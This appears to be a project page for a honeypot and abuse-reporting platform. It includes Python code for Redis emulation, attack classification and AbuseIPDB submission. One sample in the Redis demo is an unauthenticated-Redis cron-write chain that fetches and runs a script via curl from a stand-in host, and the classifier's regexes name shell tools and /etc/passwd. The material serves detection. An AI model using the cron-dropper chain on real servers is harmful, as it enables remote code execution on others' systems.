Security Telemetry // Community Intelligence

Community Reputation

This telemetry stack runs on BGP-announced address space in Wolverhampton, UK and emulates exposed production services at protocol level. It captures unsolicited abuse traffic, classifies attack intent, and feeds verified events into blocklist and community reporting workflows.

  • 1,024 routable IPv4 listeners
  • ~1,813 IPv6 /48 equivalents
  • 60+ TCP services, plus UDP 69 (TFTP) and UDP 161 (SNMP)
  • Wolverhampton, UK: own announced infrastructure

How It Works

The platform listens on 1,024 routable IPv4 addresses and approximately 1,813 IPv6 /48 equivalents on owned, announced infrastructure rather than rented virtual machines. The space is announced specifically for telemetry and hosts no legitimate service, so every inbound connection is unsolicited and is treated as suspicious by default.

Services Monitored

Emulation is protocol-aware rather than simple socket listening: each listener speaks enough of the target protocol to elicit the attacker's next step instead of only recording the first bytes on the wire. The following service groups are actively monitored.

Remote Access and Auth

SSH (22/2222), Telnet (23), FTP (21), WinRM (5985/5986), RDP (3389), VNC (5900), LDAP/LDAPS (389/636), IMAP/IMAPS (143/993), POP3/POP3S (110/995), SMTP (25/465/587).

Web and Control APIs

HTTP/HTTPS (80/443/8080/8443) with full request logging, Docker API (2375/2376), Kubernetes API (6443), etcd (2379/2380), Jenkins agent port (50000), Confluence (8090), WebLogic (7001), Consul (8500).

Datastores and Middleware

Redis (6379), Elasticsearch (9200), MongoDB (27017), MySQL (3306), MSSQL (1433), PostgreSQL (5432), Cassandra (9042), CouchDB (5984), Memcached (11211).

IoT and Embedded Protocols

RTSP (554/8554) camera emulation, SIP/VoIP (5060), MQTT (1883), CWMP/TR-069 (7547), TFTP UDP (69), SNMP UDP (161), ADB (5555), plus exploit probes aligned with HG532/UPnP families.

File and Network Services

rsync (873), SMB/CIFS (445), Oracle TNS (1521), and infrastructure probes touching Prometheus (9090), Grafana (3000), and Hadoop NameNode (50070).
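What protocol-aware emulation looks like in practice, as an added example that is not the platform's own code: a minimal Redis listener that parses both RESP arrays and the inline commands scanners tend to send, replies the way an unauthenticated server would so the attacker keeps going, and names the intent of the whole session from the CONFIG SET / SAVE chain rather than from any single command. The sample payloads are constructed, and the reply texts (version string, error messages) are assumptions modelled on Redis defaults.

```python
"""Protocol-aware Redis emulation for a honeypot listener: RESP parsing plus
intent tracking across a session.

Added example, not the Wolverhampton platform's own code. A socket that only
records bytes sees "CONFIG SET dir ..." and nothing more; an emulator that
answers "+OK" sees where the attacker wants the RDB file written.
Sample payloads are constructed, not captured traffic.
"""
from __future__ import annotations


def parse_resp(data: bytes) -> list[list[str]]:
    """Split a client buffer into argv lists.

    Handles RESP arrays ("*2\\r\\n$6\\r\\nCONFIG\\r\\n...") as real clients send
    them, and inline commands ("config set dir /tmp\\r\\n") as many scanners do.
    """
    commands: list[list[str]] = []
    pos = 0
    while pos < len(data):
        if data[pos:pos + 1] == b"*":
            end = data.index(b"\r\n", pos)
            count = int(data[pos + 1:end])
            pos = end + 2
            argv = []
            for _ in range(count):
                if data[pos:pos + 1] != b"$":
                    raise ValueError("malformed RESP: expected bulk string")
                end = data.index(b"\r\n", pos)
                length = int(data[pos + 1:end])
                pos = end + 2
                argv.append(data[pos:pos + length].decode("utf-8", "replace"))
                pos += length + 2          # skip payload and its trailing CRLF
            commands.append(argv)
        else:
            end = data.find(b"\r\n", pos)
            if end == -1:
                end = len(data)
            line = data[pos:end].decode("utf-8", "replace").strip()
            if line:
                commands.append(line.split())
            pos = end + 2
    return commands


def reply_for(argv: list[str]) -> bytes:
    """Answer as an unauthenticated, permissive Redis would (reply texts are
    assumptions modelled on Redis defaults) so the attacker proceeds."""
    cmd = argv[0].upper() if argv else ""
    if cmd == "PING":
        return b"+PONG\r\n"
    if cmd == "INFO":
        body = b"# Server\r\nredis_version:5.0.7\r\nos:Linux 4.15.0 x86_64\r\n"
        return b"$%d\r\n%s\r\n" % (len(body), body)
    if cmd == "AUTH":
        return b"-ERR Client sent AUTH, but no password is set\r\n"
    if cmd in ("CONFIG", "SET", "SAVE", "BGSAVE", "FLUSHALL", "SLAVEOF", "REPLICAOF"):
        return b"+OK\r\n"
    return b"-ERR unknown command '%s'\r\n" % cmd.encode()


def classify_session(commands: list[list[str]]) -> str:
    """Name the intent of the whole command sequence. The file-write chain
    (CONFIG SET dir/dbfilename, SET, SAVE) is the classic unauthenticated-Redis
    abuse; the destination path separates cron, SSH-key and webshell variants."""
    rdb_dir, rdb_name, wrote_key = None, "dump.rdb", False
    for argv in commands:
        if not argv:
            continue
        cmd = argv[0].upper()
        if cmd == "CONFIG" and len(argv) >= 4 and argv[1].upper() == "SET":
            if argv[2].lower() == "dir":
                rdb_dir = argv[3]
            elif argv[2].lower() == "dbfilename":
                rdb_name = argv[3]
        elif cmd in ("SLAVEOF", "REPLICAOF") and len(argv) >= 3:
            return "rogue-master-replication"   # module loading via a fake master
        elif cmd in ("SAVE", "BGSAVE") and rdb_dir is not None:
            target = rdb_dir.rstrip("/") + "/" + rdb_name
            if "/cron" in target:
                return "cron-write-via-rdb"
            if "/.ssh/" in target or target.endswith("authorized_keys"):
                return "ssh-key-write-via-rdb"
            if target.endswith((".php", ".jsp")):
                return "webshell-write-via-rdb"
            return "arbitrary-file-write-via-rdb"
        elif cmd in ("SET", "FLUSHALL"):
            wrote_key = True
    return "data-write" if wrote_key else "recon"


def handle_buffer(data: bytes) -> tuple[list[bytes], str]:
    """Parse everything the client sent so far, produce replies, tag the session."""
    commands = parse_resp(data)
    return [reply_for(argv) for argv in commands], classify_session(commands)


def resp(*args: str) -> bytes:
    """Encode argv as a RESP array (useful for building test traffic)."""
    out = b"*%d\r\n" % len(args)
    for a in args:
        raw = a.encode()
        out += b"$%d\r\n%s\r\n" % (len(raw), raw)
    return out


if __name__ == "__main__":
    # Constructed inline chain of the kind cron-dropper scanners send.
    chain = (b"config set dir /var/spool/cron\r\nconfig set dbfilename root\r\n"
             b"set x \"\\n* * * * * curl 192.0.2.10/x.sh|sh\\n\"\r\nsave\r\n")
    print(handle_buffer(chain))
```

Wire this behind a real socket and the "+OK" replies are what turn a one-line "CONFIG SET" record into a fully attributed cron-write or SSH-key-write event.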

Attack Categories Detected

Events are tagged by attack class and severity using service context and payload characteristics.

Credential Brute-Force

Repeated auth attempts across SSH, FTP, Telnet, IMAP, POP3, LDAP, RDP, and VNC. Example: multi-service username/password spray.

Web Exploitation

SQL injection, command injection, path traversal, and PHP eval-style payloads. Example: exploit strings in HTTP path/query/body data.

Database Enumeration

Unauthenticated probing and data-access attempts against Redis, MongoDB, Elasticsearch, and CouchDB.

Container and Cloud Abuse

Docker API remote execution patterns, etcd configuration theft behavior, and Kubernetes API reconnaissance.

IoT Exploitation

RTSP camera auth attacks, CWMP router probing, MQTT broker checks, and TFTP firmware/config request patterns.

Network Exploitation

SMB negotiate/exploit traffic aligned with EternalBlue-class tooling and rsync service enumeration.

Amplification Staging

Probes that test whether Memcached, SNMP, or TFTP will answer unauthenticated requests, which is the precondition for using a host as a reflector in reflection or amplification attacks.

C2 and Callback Activity

Reverse-shell callback attempts and command-and-control check-ins, including connections to TCP 4444, a default listener port for common reverse-shell tooling.
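Tagging by service context plus payload characteristics, as an added example that is not the platform's classifier: one rule per category above, applied to constructed sample events, with repeated auth attempts from a single source promoted to credential brute-force. The port groups, regexes, the threshold of five attempts and the severity labels are assumptions.

```python
"""Tag honeypot events by attack class and severity from service context
(port, transport) plus payload characteristics.

Added example, not the platform's own tagging logic. Port groups, regexes,
severity labels and the brute-force threshold are assumptions chosen to
illustrate the categories listed above; sample events are constructed.
"""
from __future__ import annotations
import re
from collections import Counter
from dataclasses import dataclass
from urllib.parse import unquote

AUTH_PORTS = {21, 22, 23, 110, 143, 389, 636, 993, 995, 2222, 3389, 5900, 5985, 5986}
WEB_PORTS = {80, 443, 8080, 8443, 8090, 7001, 8500, 3000, 9090, 50000, 50070}
DATASTORE_PORTS = {6379, 27017, 9200, 5984, 3306, 1433, 5432, 9042, 1521}
BRUTE_FORCE_THRESHOLD = 5  # assumption: auth attempts from one source within a batch

WEB_RULES = [  # (class suffix, pattern) checked against the URL-decoded request
    ("sql-injection", re.compile(r"union\s+select|'\s*or\s+'?1'?\s*=\s*'?1|sleep\(\d+\)", re.I)),
    ("command-injection", re.compile(r"[;|`]\s*(wget|curl|sh|bash|nc)\b|\$\(", re.I)),
    ("path-traversal", re.compile(r"(\.\./){2,}|/etc/passwd")),
    ("php-eval", re.compile(r"eval\(|base64_decode\(|php://input|allow_url_include", re.I)),
]


@dataclass
class Event:
    src: str
    port: int
    proto: str      # "tcp" or "udp"
    payload: bytes


def classify(ev: Event) -> tuple[str, str]:
    """Return (attack_class, severity) for a single event, without source history."""
    raw, text, p = ev.payload, unquote(ev.payload.decode("latin-1")), ev.port
    if p == 4444:                                   # default port of common reverse-shell listeners
        return "c2-callback", "high"
    if p in AUTH_PORTS:
        return "auth-attempt", "low"                # promoted to brute-force by tag_events()
    if p in WEB_PORTS:
        for name, rx in WEB_RULES:
            if rx.search(text):
                return f"web-exploitation/{name}", "high"
        return "web-probe", "low"
    if p == 2375 and re.match(r"(POST|GET) /(v[\d.]+/)?(containers|exec|images)", text):
        return "container-abuse/docker-api", "critical"
    if p in (2379, 2380) and ("/v2/keys" in text or "/v3/kv/range" in text):
        return "container-abuse/etcd-config-theft", "critical"
    if p == 6443 and text.startswith("GET /api"):
        return "container-abuse/kubernetes-recon", "medium"
    if p in DATASTORE_PORTS:
        return "database-enumeration", ("medium" if text.strip() else "low")
    if p in (554, 8554) and text.startswith(("DESCRIBE", "OPTIONS")):
        return "iot-exploitation/rtsp-camera", ("high" if "Authorization:" in text else "low")
    if p == 7547 and text.startswith("POST"):
        return "iot-exploitation/cwmp-router", "high"
    if p == 1883 and raw[:1] == b"\x10":            # MQTT CONNECT packet type
        return "iot-exploitation/mqtt-broker", "medium"
    if p == 5555 and raw.startswith(b"CNXN"):       # ADB connect handshake
        return "iot-exploitation/adb", "high"
    if p == 69 and raw[:2] == b"\x00\x01":          # TFTP read request
        filename = raw[2:].split(b"\x00", 1)[0].decode("latin-1")
        if re.search(r"config|\.cfg$|\.bin$|firmware", filename, re.I):
            return "iot-exploitation/tftp-config-request", "high"
        return "amplification-staging/tftp", "medium"
    if p == 11211 and text.lstrip().startswith("stats"):
        return "amplification-staging/memcached", "medium"
    if p == 161 and raw[:1] == b"\x30":             # BER SEQUENCE: start of an SNMP message
        return "amplification-staging/snmp", "medium"
    if p == 445 and (b"\xffSMB" in raw or b"\xfeSMB" in raw):
        return "network-exploitation/smb", "high"
    if p == 873 and text.startswith("@RSYNCD"):
        return "network-exploitation/rsync-enumeration", "medium"
    return "unclassified-probe", "low"


def tag_events(events: list[Event]) -> list[tuple[Event, str, str]]:
    """Classify a batch, then promote repeated auth attempts per source to brute-force."""
    tagged = [(ev, *classify(ev)) for ev in events]
    auth_hits = Counter(ev.src for ev, cls, _ in tagged if cls == "auth-attempt")
    out = []
    for ev, cls, sev in tagged:
        if cls == "auth-attempt" and auth_hits[ev.src] >= BRUTE_FORCE_THRESHOLD:
            cls, sev = "credential-brute-force", "high"
        out.append((ev, cls, sev))
    return out
```

The URL-decoding step matters: `%2e%2e/` traversal and `%20union%20select` would slip past rules that only look at the raw request line.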

Scanner Exclusion

Abuse reporting is gated by a suppression pipeline that removes legitimate internet measurement and research traffic before any external submission.

Inbound activity is normalised and de-duplicated to remove repeated noise.

Traffic is evaluated with internal vetting signals to separate broad survey traffic from targeted abuse.

Research scanner events remain in local telemetry only and are excluded from AbuseIPDB submissions.

AbuseIPDB Reporting

Confirmed abuse events are reported to AbuseIPDB with structured context: the attacked service, the attack method, network attribution, and a short proof snippet.

Reports are rate-limited per source to avoid duplicate spam and maintain signal quality. AbuseIPDB itself rejects a repeat report of the same IP within 15 minutes, so a per-source window of at least that length also avoids wasted API calls.

Comment format examples:
  • SSH authentication brute-force
  • SMB/CIFS exploit attempt (EternalBlue-class)
  • Docker API unauthenticated exploit attempt
  • etcd/Kubernetes configuration store theft behavior
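The suppression, de-duplication, rate-limiting and comment-building steps described under Scanner Exclusion and AbuseIPDB Reporting, combined in one added example that is not the platform's pipeline. The research-scanner rDNS suffix list, the survey heuristic, the time windows, the category choices, the attack-class names and the sample events (including the constructed rDNS table) are assumptions; the comment prefixes follow the formats listed above, and the request body matches the fields AbuseIPDB's v2 report endpoint takes.

```python
"""Gate confirmed events into AbuseIPDB reports: suppress research scanners and
broad surveys, de-duplicate, rate-limit per source, then build the comment and
the form body for the v2 /report endpoint.

Added example, not the platform's pipeline. rDNS list, survey heuristic,
windows, category choices, class names and sample events are assumptions.
Category numbers follow AbuseIPDB's published report categories
(18 Brute-Force, 22 SSH, 15 Hacking, 21 Web App Attack); verify before use.
"""
from __future__ import annotations
import json
import re
import urllib.parse
import urllib.request
from collections import defaultdict
from typing import Callable

# attack_class -> (comment prefix, categories). Anything else stays local only.
REPORTABLE = {
    "credential-brute-force/ssh": ("SSH authentication brute-force", "18,22"),
    "network-exploitation/smb": ("SMB/CIFS exploit attempt (EternalBlue-class)", "15"),
    "container-abuse/docker-api": ("Docker API unauthenticated exploit attempt", "15,21"),
    "container-abuse/etcd-config-theft": ("etcd/Kubernetes configuration store theft behavior", "15"),
}
RESEARCH_RDNS_SUFFIXES = (".shodan.io", ".censys.io", ".shadowserver.org")  # assumption: seed list
SURVEY_MIN_PORTS = 8         # assumption: this many ports touched with nothing reportable = survey
DEDUP_WINDOW = 60 * 60       # assumption: one report per (src, port, class) per hour
RATE_LIMIT_WINDOW = 15 * 60  # assumption: one report per source per 15 minutes
PROOF_MAX = 80               # the comment is public: short, printable proof only


def proof_snippet(payload: bytes) -> str:
    return re.sub(r"[^\x20-\x7e]", ".", payload.decode("latin-1"))[:PROOF_MAX]


def build_report(e: dict) -> dict:
    """Form fields for POST https://api.abuseipdb.com/api/v2/report."""
    label, categories = REPORTABLE[e["attack_class"]]
    comment = f"{label} | {e['proto']}/{e['port']} | {e['asn']} | proof: {proof_snippet(e['payload'])}"
    return {"ip": e["src"], "categories": categories, "comment": comment}


class ReportGate:
    def __init__(self, rdns: Callable[[str], str | None]):
        self.rdns = rdns                        # injected so the demo runs offline
        self.seen: dict[tuple, float] = {}      # (src, port, class) -> last report ts
        self.last_report: dict[str, float] = {}
        self.suppressed = 0

    def is_research_scanner(self, src: str) -> bool:
        return (self.rdns(src) or "").endswith(RESEARCH_RDNS_SUFFIXES)

    @staticmethod
    def is_broad_survey(evs: list[dict]) -> bool:
        ports = {e["port"] for e in evs}
        return len(ports) >= SURVEY_MIN_PORTS and not any(e["attack_class"] in REPORTABLE for e in evs)

    def process(self, events: list[dict]) -> list[dict]:
        by_src: dict[str, list[dict]] = defaultdict(list)
        for e in events:
            by_src[e["src"]].append(e)
        reports = []
        for src, evs in by_src.items():
            if self.is_research_scanner(src) or self.is_broad_survey(evs):
                self.suppressed += len(evs)     # kept in local telemetry, never submitted
                continue
            for e in sorted(evs, key=lambda e: e["ts"]):
                if e["attack_class"] not in REPORTABLE:
                    continue
                key = (src, e["port"], e["attack_class"])
                if (e["ts"] - self.seen.get(key, float("-inf")) < DEDUP_WINDOW
                        or e["ts"] - self.last_report.get(src, float("-inf")) < RATE_LIMIT_WINDOW):
                    continue                    # duplicate, or source reported inside the window
                self.seen[key] = self.last_report[src] = e["ts"]
                reports.append(build_report(e))
        return reports


def submit(report: dict, api_key: str) -> dict:
    """Network call; not exercised by the offline sample below."""
    req = urllib.request.Request("https://api.abuseipdb.com/api/v2/report",
                                 data=urllib.parse.urlencode(report).encode(),
                                 headers={"Key": api_key, "Accept": "application/json"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)


def _ev(src, ts, port, cls, payload=b"", asn="AS64496"):
    return {"src": src, "ts": ts, "port": port, "proto": "tcp", "asn": asn,
            "attack_class": cls, "payload": payload}


# Constructed sample batch: an SSH brute-forcer, a research scanner, a broad survey.
RDNS = {"203.0.113.20": "scanner-01.shodan.io"}   # constructed reverse-DNS table
SSH, DOCKER = "credential-brute-force/ssh", "container-abuse/docker-api"
SAMPLE = [_ev("203.0.113.10", t, 22, SSH, b"SSH-2.0-libssh_0.9.6") for t in (1000, 1010, 1020, 5000)]
SAMPLE += [_ev("203.0.113.10", 1030, 2375, DOCKER, b"POST /v1.41/containers/create HTTP/1.1"),
           _ev("203.0.113.20", 1000, 2375, DOCKER, b"GET /version HTTP/1.1", asn="AS64498")]
SAMPLE += [_ev("198.51.100.30", 2000 + i, p, "service-probe", asn="AS64497")
           for i, p in enumerate((21, 22, 23, 80, 443, 3306, 6379, 8080, 9200))]


def run_sample() -> tuple[list[dict], int]:
    gate = ReportGate(lambda ip: RDNS.get(ip))
    return gate.process(SAMPLE), gate.suppressed
```

On the sample batch the gate emits two reports for 203.0.113.10 (the first SSH event and the one an hour later), drops the Docker event that arrives 30 seconds after the first report, and suppresses the Shodan-attributed source and the nine-port survey. In production one would merge the Docker evidence into the next comment for that source rather than discard it.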

Contributor profile: abuseipdb.com/user/121600


Live Telemetry Snapshot

Your browser polls hp-dash.aaran.cloud/api/stats directly and refreshes this panel every 30 seconds.

Snapshot fields (values are filled in live):

  • Total Hits
  • Unique IPs
  • Total Reported
  • Scanners Suppressed
  • Hits Last Hour
  • Hits Last 24h
  • Top Attack Types, Top Ports, and Top Countries breakdowns

Live Honeypot Dashboard

Public access is available for live telemetry review, including the real-time 2D world attack map, live event feed, top attacking sources, and protocol/attack breakdown views:

  • Live world map
  • Event stream
  • Top attacking IPs
  • Protocol breakdown
  • Severity split

Open the live map at hp-dash.aaran.cloud.

Why This Matters

The objective is practical, production-ready reputation intelligence: reducing abusive traffic exposure, improving response speed, and helping keep shared infrastructure ecosystems cleaner for everyone involved.

For collaboration or private feed discussion, use hello@aaran.cloud.